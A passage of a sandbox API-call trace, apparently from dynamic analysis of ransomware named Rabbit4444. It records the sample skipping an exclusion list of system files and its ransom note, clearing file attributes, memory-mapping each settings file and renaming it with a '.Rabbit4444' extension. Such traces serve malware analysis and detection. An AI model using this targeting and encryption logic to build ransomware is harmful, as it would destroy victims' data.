(lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Privacy_EnableCollectionOfUrlsAppsUse.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_privacy_enablecollectionofurlsappsuse.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Privacy_EnableCollectionOfUrlsAppsUse.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_privacy_enablecollectionofurlsappsuse.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0057.924] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x36600ba6, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x36600ba6, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x233e650b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x506, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SystemSettings_Privacy_OpenPrivacyStatementLink.settingcontent-ms", cAlternateFileName="AA46A8~1.SET")) returned 1 [0057.924] lstrcmpiW (lpString1="AAA_SystemSettings_Privacy_OpenPrivacyStatementLink.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.924] lstrcmpiW (lpString1="AAA_SystemSettings_Privacy_OpenPrivacyStatementLink.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0057.924] lstrcmpiW (lpString1="AAA_SystemSettings_Privacy_OpenPrivacyStatementLink.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0057.924] lstrcmpiW (lpString1="AAA_SystemSettings_Privacy_OpenPrivacyStatementLink.settingcontent-ms", lpString2=".") returned 1 [0057.924] lstrcmpiW (lpString1="AAA_SystemSettings_Privacy_OpenPrivacyStatementLink.settingcontent-ms", lpString2="..") returned 1 [0057.924] lstrcmpiW (lpString1="AAA_SystemSettings_Privacy_OpenPrivacyStatementLink.settingcontent-ms", lpString2="windows") returned -1 [0057.924] lstrcmpiW (lpString1="AAA_SystemSettings_Privacy_OpenPrivacyStatementLink.settingcontent-ms", lpString2="bootmgr") returned -1 [0057.924] lstrcmpiW (lpString1="AAA_SystemSettings_Privacy_OpenPrivacyStatementLink.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0057.925] lstrcmpiW (lpString1="AAA_SystemSettings_Privacy_OpenPrivacyStatementLink.settingcontent-ms", lpString2="boot") returned -1 [0057.925] lstrcmpiW (lpString1="AAA_SystemSettings_Privacy_OpenPrivacyStatementLink.settingcontent-ms", lpString2="ids.txt") returned -1 [0057.925] lstrcmpiW (lpString1="AAA_SystemSettings_Privacy_OpenPrivacyStatementLink.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0057.925] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_Privacy_OpenPrivacyStatementLink.settingcontent-ms" | out: lpString1="AAA_SystemSettings_Privacy_OpenPrivacyStatementLink.settingcontent-ms") returned="AAA_SystemSettings_Privacy_OpenPrivacyStatementLink.settingcontent-ms" [0057.925] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Privacy_OpenPrivacyStatementLink.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0057.925] lstrlenW (lpString="AAA_SystemSettings_Privacy_OpenPrivacyStatementLink.settingcontent-ms") returned 69 [0057.925] lstrlenW (lpString="Rabbit4444") returned 10 [0057.925] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0057.925] lstrlenW (lpString=".dll") returned 4 [0057.925] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0057.925] lstrlenW (lpString=".lnk") returned 4 [0057.925] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0057.925] lstrlenW (lpString=".ini") returned 4 [0057.925] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0057.925] lstrlenW (lpString=".sys") returned 4 [0057.925] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0057.925] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Privacy_OpenPrivacyStatementLink.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_privacy_openprivacystatementlink.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0057.926] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0057.926] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14923635217) returned 1 [0057.926] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1286) returned 1 [0057.926] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1179c8 [0057.926] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101fb8 [0057.926] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x810, lpName=0x0) returned 0x298 [0057.927] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x810) returned 0x70000 [0057.928] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0057.928] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0057.928] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.928] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0057.928] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0057.929] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0057.929] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.930] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0057.930] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14924029790) returned 1 [0057.930] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1179c8 | out: hHeap=0xe0000) returned 1 [0057.930] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101fb8 | out: hHeap=0xe0000) returned 1 [0057.930] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0057.930] CloseHandle (hObject=0x298) returned 1 [0057.930] CloseHandle (hObject=0x278) returned 1 [0057.930] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Privacy_OpenPrivacyStatementLink.settingcontent-ms.Rabbit4444") returned 197 [0057.930] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Privacy_OpenPrivacyStatementLink.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_privacy_openprivacystatementlink.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Privacy_OpenPrivacyStatementLink.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_privacy_openprivacystatementlink.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0057.931] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x368893ac, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x368893ac, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x23a4ea03, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4f3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SystemSettings_Proxy_AutomaticConfigScript.settingcontent-ms", cAlternateFileName="AAF4CE~1.SET")) returned 1 [0057.931] lstrcmpiW (lpString1="AAA_SystemSettings_Proxy_AutomaticConfigScript.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.931] lstrcmpiW (lpString1="AAA_SystemSettings_Proxy_AutomaticConfigScript.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0057.931] lstrcmpiW (lpString1="AAA_SystemSettings_Proxy_AutomaticConfigScript.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0057.931] lstrcmpiW (lpString1="AAA_SystemSettings_Proxy_AutomaticConfigScript.settingcontent-ms", lpString2=".") returned 1 [0057.931] lstrcmpiW (lpString1="AAA_SystemSettings_Proxy_AutomaticConfigScript.settingcontent-ms", lpString2="..") returned 1 [0057.931] lstrcmpiW (lpString1="AAA_SystemSettings_Proxy_AutomaticConfigScript.settingcontent-ms", lpString2="windows") returned -1 [0057.931] lstrcmpiW (lpString1="AAA_SystemSettings_Proxy_AutomaticConfigScript.settingcontent-ms", lpString2="bootmgr") returned -1 [0057.931] lstrcmpiW (lpString1="AAA_SystemSettings_Proxy_AutomaticConfigScript.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0057.931] lstrcmpiW (lpString1="AAA_SystemSettings_Proxy_AutomaticConfigScript.settingcontent-ms", lpString2="boot") returned -1 [0057.931] lstrcmpiW (lpString1="AAA_SystemSettings_Proxy_AutomaticConfigScript.settingcontent-ms", lpString2="ids.txt") returned -1 [0057.931] lstrcmpiW (lpString1="AAA_SystemSettings_Proxy_AutomaticConfigScript.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0057.931] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_Proxy_AutomaticConfigScript.settingcontent-ms" | out: lpString1="AAA_SystemSettings_Proxy_AutomaticConfigScript.settingcontent-ms") returned="AAA_SystemSettings_Proxy_AutomaticConfigScript.settingcontent-ms" [0057.931] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Proxy_AutomaticConfigScript.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0057.931] lstrlenW (lpString="AAA_SystemSettings_Proxy_AutomaticConfigScript.settingcontent-ms") returned 64 [0057.931] lstrlenW (lpString="Rabbit4444") returned 10 [0057.931] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0057.932] lstrlenW (lpString=".dll") returned 4 [0057.932] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0057.932] lstrlenW (lpString=".lnk") returned 4 [0057.932] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0057.932] lstrlenW (lpString=".ini") returned 4 [0057.932] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0057.932] lstrlenW (lpString=".sys") returned 4 [0057.932] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0057.932] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Proxy_AutomaticConfigScript.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_proxy_automaticconfigscript.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0057.932] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0057.932] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14924279890) returned 1 [0057.932] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1267) returned 1 [0057.932] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117608 [0057.932] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1020c8 [0057.932] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x800, lpName=0x0) returned 0x298 [0057.933] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x800) returned 0x70000 [0057.934] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0057.934] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0057.934] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.934] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0057.934] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0057.935] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0057.935] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.935] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0057.935] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14924543948) returned 1 [0057.935] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117608 | out: hHeap=0xe0000) returned 1 [0057.935] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1020c8 | out: hHeap=0xe0000) returned 1 [0057.935] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0057.935] CloseHandle (hObject=0x298) returned 1 [0057.935] CloseHandle (hObject=0x278) returned 1 [0057.935] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Proxy_AutomaticConfigScript.settingcontent-ms.Rabbit4444") returned 192 [0057.935] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Proxy_AutomaticConfigScript.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_proxy_automaticconfigscript.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Proxy_AutomaticConfigScript.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_proxy_automaticconfigscript.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0057.936] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x36a9f43c, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x36a9f43c, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x23a287a5, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4e4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SystemSettings_Proxy_AutomaticDetection.settingcontent-ms", cAlternateFileName="AA6598~1.SET")) returned 1 [0057.936] lstrcmpiW (lpString1="AAA_SystemSettings_Proxy_AutomaticDetection.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.936] lstrcmpiW (lpString1="AAA_SystemSettings_Proxy_AutomaticDetection.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0057.936] lstrcmpiW (lpString1="AAA_SystemSettings_Proxy_AutomaticDetection.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0057.936] lstrcmpiW (lpString1="AAA_SystemSettings_Proxy_AutomaticDetection.settingcontent-ms", lpString2=".") returned 1 [0057.936] lstrcmpiW (lpString1="AAA_SystemSettings_Proxy_AutomaticDetection.settingcontent-ms", lpString2="..") returned 1 [0057.936] lstrcmpiW (lpString1="AAA_SystemSettings_Proxy_AutomaticDetection.settingcontent-ms", lpString2="windows") returned -1 [0057.936] lstrcmpiW (lpString1="AAA_SystemSettings_Proxy_AutomaticDetection.settingcontent-ms", lpString2="bootmgr") returned -1 [0057.936] lstrcmpiW (lpString1="AAA_SystemSettings_Proxy_AutomaticDetection.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0057.936] lstrcmpiW (lpString1="AAA_SystemSettings_Proxy_AutomaticDetection.settingcontent-ms", lpString2="boot") returned -1 [0057.936] lstrcmpiW (lpString1="AAA_SystemSettings_Proxy_AutomaticDetection.settingcontent-ms", lpString2="ids.txt") returned -1 [0057.936] lstrcmpiW (lpString1="AAA_SystemSettings_Proxy_AutomaticDetection.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0057.936] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_Proxy_AutomaticDetection.settingcontent-ms" | out: lpString1="AAA_SystemSettings_Proxy_AutomaticDetection.settingcontent-ms") returned="AAA_SystemSettings_Proxy_AutomaticDetection.settingcontent-ms" [0057.936] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Proxy_AutomaticDetection.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0057.937] lstrlenW (lpString="AAA_SystemSettings_Proxy_AutomaticDetection.settingcontent-ms") returned 61 [0057.937] lstrlenW (lpString="Rabbit4444") returned 10 [0057.937] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0057.937] lstrlenW (lpString=".dll") returned 4 [0057.937] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0057.937] lstrlenW (lpString=".lnk") returned 4 [0057.937] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0057.937] lstrlenW (lpString=".ini") returned 4 [0057.937] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0057.937] lstrlenW (lpString=".sys") returned 4 [0057.937] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0057.937] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Proxy_AutomaticDetection.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_proxy_automaticdetection.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0057.937] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0057.937] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14924789439) returned 1 [0057.937] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1252) returned 1 [0057.937] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1176f8 [0057.937] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101518 [0057.937] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7f0, lpName=0x0) returned 0x298 [0057.938] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7f0) returned 0x70000 [0057.939] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0057.939] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109258 [0057.939] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.939] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0057.939] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0057.940] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0057.940] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.940] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109258 | out: hHeap=0xe0000) returned 1 [0057.940] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14925040851) returned 1 [0057.940] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1176f8 | out: hHeap=0xe0000) returned 1 [0057.940] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101518 | out: hHeap=0xe0000) returned 1 [0057.940] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0057.940] CloseHandle (hObject=0x298) returned 1 [0057.940] CloseHandle (hObject=0x278) returned 1 [0057.940] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Proxy_AutomaticDetection.settingcontent-ms.Rabbit4444") returned 189 [0057.940] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Proxy_AutomaticDetection.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_proxy_automaticdetection.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Proxy_AutomaticDetection.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_proxy_automaticdetection.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0057.941] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x36d27ca3, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x36d27ca3, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x23969bec, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4e1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SystemSettings_Proxy_ManualProxyAddress.settingcontent-ms", cAlternateFileName="AA8AB0~1.SET")) returned 1 [0057.941] lstrcmpiW (lpString1="AAA_SystemSettings_Proxy_ManualProxyAddress.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.941] lstrcmpiW (lpString1="AAA_SystemSettings_Proxy_ManualProxyAddress.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0057.941] lstrcmpiW (lpString1="AAA_SystemSettings_Proxy_ManualProxyAddress.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0057.941] lstrcmpiW (lpString1="AAA_SystemSettings_Proxy_ManualProxyAddress.settingcontent-ms", lpString2=".") returned 1 [0057.941] lstrcmpiW (lpString1="AAA_SystemSettings_Proxy_ManualProxyAddress.settingcontent-ms", lpString2="..") returned 1 [0057.941] lstrcmpiW (lpString1="AAA_SystemSettings_Proxy_ManualProxyAddress.settingcontent-ms", lpString2="windows") returned -1 [0057.941] lstrcmpiW (lpString1="AAA_SystemSettings_Proxy_ManualProxyAddress.settingcontent-ms", lpString2="bootmgr") returned -1 [0057.941] lstrcmpiW (lpString1="AAA_SystemSettings_Proxy_ManualProxyAddress.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0057.941] lstrcmpiW (lpString1="AAA_SystemSettings_Proxy_ManualProxyAddress.settingcontent-ms", lpString2="boot") returned -1 [0057.941] lstrcmpiW (lpString1="AAA_SystemSettings_Proxy_ManualProxyAddress.settingcontent-ms", lpString2="ids.txt") returned -1 [0057.941] lstrcmpiW (lpString1="AAA_SystemSettings_Proxy_ManualProxyAddress.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0057.941] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_Proxy_ManualProxyAddress.settingcontent-ms" | out: lpString1="AAA_SystemSettings_Proxy_ManualProxyAddress.settingcontent-ms") returned="AAA_SystemSettings_Proxy_ManualProxyAddress.settingcontent-ms" [0057.941] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Proxy_ManualProxyAddress.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0057.942] lstrlenW (lpString="AAA_SystemSettings_Proxy_ManualProxyAddress.settingcontent-ms") returned 61 [0057.942] lstrlenW (lpString="Rabbit4444") returned 10 [0057.942] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0057.942] lstrlenW (lpString=".dll") returned 4 [0057.942] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0057.942] lstrlenW (lpString=".lnk") returned 4 [0057.942] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0057.942] lstrlenW (lpString=".ini") returned 4 [0057.942] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0057.942] lstrlenW (lpString=".sys") returned 4 [0057.942] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0057.942] CreateFileW 